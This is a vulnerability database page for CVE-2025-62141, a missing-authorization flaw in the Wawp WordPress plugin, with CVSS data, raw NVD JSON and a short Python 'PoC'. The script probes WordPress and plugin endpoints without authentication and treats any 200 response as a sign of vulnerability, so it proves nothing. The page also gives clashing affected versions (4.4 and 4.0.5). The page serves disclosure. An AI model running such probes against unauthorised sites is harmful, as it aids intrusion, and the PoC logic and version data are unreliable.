Security Vulnerability Report
中文
CVE-2025-62141 CVSS 5.3 MEDIUM

CVE-2025-62141

Published: 2025-12-31 15:15:53
Last Modified: 2026-04-23 15:34:37

Description

Missing Authorization vulnerability in Information Technology Wawp automation-web-platform allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wawp: from n/a through <= 4.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Wawp automation-web-platform <= 4.4
Wawp automation-web-platform < 4.5 (if fixed version available)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62141 PoC - Missing Authorization in Wawp Plugin # Target: WordPress site with Wawp plugin <= 4.4 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-62141 Missing Authorization in Wawp automation-web-platform """ # Common Wawp plugin endpoints that may be affected vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wawp/v1/", "/?rest_route=/wawp/v1/", "/wp-content/plugins/automation-web-platform/" ] print(f"[*] Testing target: {TARGET_URL}") print(f"[*] CVE-2025-62141 - Wawp Missing Authorization Check") # Test without authentication for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" try: response = requests.get(url, timeout=10, verify=False) print(f"[+] Endpoint: {endpoint} - Status: {response.status_code}") # Check if response indicates unauthorized access was successful if response.status_code == 200: print(f"[!] Potential vulnerable endpoint found: {url}") print(f"[!] Response preview: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62141", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:53.060", "lastModified": "2026-04-23T15:34:37.090", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Information Technology Wawp automation-web-platform allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wawp: from n/a through <= 4.4."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en 101gen Wawp permite la Explotación de Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Wawp: desde n/d hasta 4.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/automation-web-platform/vulnerability/wordpress-wawp-plugin-4-0-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}